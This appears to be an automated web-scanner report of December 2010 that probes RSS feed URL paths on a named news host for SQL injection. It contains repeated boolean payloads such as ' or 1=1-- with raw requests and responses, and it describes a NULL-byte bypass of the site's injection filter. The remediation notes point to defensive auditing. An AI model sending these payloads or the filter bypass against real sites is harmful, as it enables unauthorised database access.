GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d1--%20/200769.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:16 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d2--%20/200769.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:17 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 84226288'%20or%201%3d1--%20 and 84226288'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi84226288'%20or%201%3d1--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:13 GMT Date: Tue, 07 Dec 2010 23:20:13 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi84226288'%20or%201%3d2--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:13 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200772.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200772.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:31 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20519805'%20or%201%3d1--%20 and 20519805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d1--%20/568/200774.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d2--%20/568/200774.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:00 GMT Content-Length: 0 Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200775.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:20:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:20:35 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200775.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:23 GMT Date: Tue, 07 Dec 2010 23:20:23 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200776.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:20:36 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200776.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:37 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18366774'%20or%201%3d1--%20 and 18366774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi18366774'%20or%201%3d1--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi18366774'%20or%201%3d2--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:21 GMT Date: Tue, 07 Dec 2010 23:20:21 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 93033723%20or%201%3d1--%20 and 93033723%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d1--%20/200778.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:39 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d2--%20/200778.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:39 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18035737'%20or%201%3d1--%20 and 18035737'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d1--%20/568/200779.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d2--%20/568/200779.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:42 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11112058'%20or%201%3d1--%20 and 11112058'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi11112058'%20or%201%3d1--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:34 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi11112058'%20or%201%3d2--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:34 GMT Date: Tue, 07 Dec 2010 23:20:34 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
